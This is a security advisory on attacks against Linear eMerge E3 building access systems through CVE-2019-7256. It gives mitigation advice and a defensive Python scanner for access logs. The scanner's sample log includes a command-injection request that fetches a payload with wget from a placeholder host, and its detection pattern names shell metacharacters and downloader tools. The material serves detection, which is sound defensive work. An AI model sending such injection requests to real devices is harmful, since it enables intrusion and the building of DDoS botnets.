Threat Watch

Building Access Control Systems Actively Being Attacked

The Linear eMerge E3 building access system, created by Linear Solutions, has an unpatched vulnerability that was first announced in May 2019, identified as CVE-2019-7256. In November 2019, code that provided a proof-of-concept exploit was released publicly. Now, researchers from SonicWall have warned that attackers are actively discovering vulnerable building access systems that are accessible directly over the Internet and exploiting them by sending a simple HTTP request to the systems. Attackers have already compromised over 2,300 of these systems and used them to launch distributed denial of service (DDoS) attacks. The vulnerability allows attackers to command the building access system to download any file, execute it, and run shell commands of the attackers’ choosing. Attackers have been using this vulnerability to target the “card_scan_decoder.php” resource in the web-based interface of eMerge E3 systems to download malware from the domain “” and immediately execute the malware. It is possible to use services such as Shodan to discover vulnerable eMerge E3 systems that are directly addressable on the Internet, and it is also practical for attackers to scan the entire range of IPv4 addresses to find vulnerable systems.


Any organization that has an eMerge E3 building access system should check that it is not connected directly to the Internet. If it is, it is reasonable to assume that it has been attacked, and it should be investigated for signs of exploitation. Building access systems and any other critical systems with a web-based user interface should not be directly accessible by an IP address on the public Internet. Instead, employees who require remote access to critical systems should first use a virtual private network (VPN) to securely authenticate to the corporate network, and then work with critical systems. That provides a crucial additional layer of security to keep attackers from exploiting vulnerabilities in systems. It is also important to monitor logs that show attempted accesses to servers so that attack attempts can be recognized quickly and mitigated.
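The log monitoring recommended above can be scripted. The following is an added example, not code from the advisory or the vendor: it assumes a web server or reverse proxy in front of the eMerge E3 interface writes common/combined-format access logs, and the sample lines, IP addresses, and parameter name `x` are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Common/combined log format: client IP, timestamp, quoted request line, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})')
TARGET = "/card_scan_decoder.php"  # resource named in the advisory
# Shell metacharacters or downloader names are never expected in a query string.
SUSPICIOUS = re.compile(r'[`;|$<>\n]|\b(?:wget|curl)\b', re.I)

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so double-encoded payloads are still seen."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan(lines):
    """Return a finding for every request that touches TARGET.

    severity is "high" when the decoded query looks like command injection,
    otherwise "review" (any Internet-sourced hit on this page deserves a look).
    """
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line we understand
        # Take everything between the method and the protocol token, so a
        # request target containing raw spaces is not silently truncated.
        target = m["req"].partition(" ")[2].rsplit(" HTTP/", 1)[0]
        parts = urlsplit(target)
        if not fully_decode(parts.path).lower().endswith(TARGET):
            continue
        hostile = SUSPICIOUS.search(fully_decode(parts.query))
        findings.append({"ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
                         "severity": "high" if hostile else "review"})
    return findings

# Constructed sample lines (documentation IP ranges, placeholder parameter "x").
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Feb/2020:03:14:07 +0000] "GET /card_scan_decoder.php?x=1;wget%20http://malware.example.invalid/a HTTP/1.1" 200 512',
    '203.0.113.9 - - [10/Feb/2020:03:15:41 +0000] "GET /Card_Scan_Decoder.php?x=%257Cid HTTP/1.1" 200 64',
    '192.0.2.10 - - [10/Feb/2020:08:02:11 +0000] "GET /card_scan_decoder.php?x=1 HTTP/1.1" 200 20',
    '192.0.2.10 - - [10/Feb/2020:08:02:12 +0000] "GET /index.php HTTP/1.1" 200 1834',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A "high" finding with a 200 status from an external address is the case to escalate first; "review" hits from outside the corporate network still indicate the interface is reachable from the Internet.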

For more information, please see:

Attackers are hacking NSC Linear eMerge E3 building access systems to launch DDoS attacks

Linear eMerge E3 access controller actively being exploited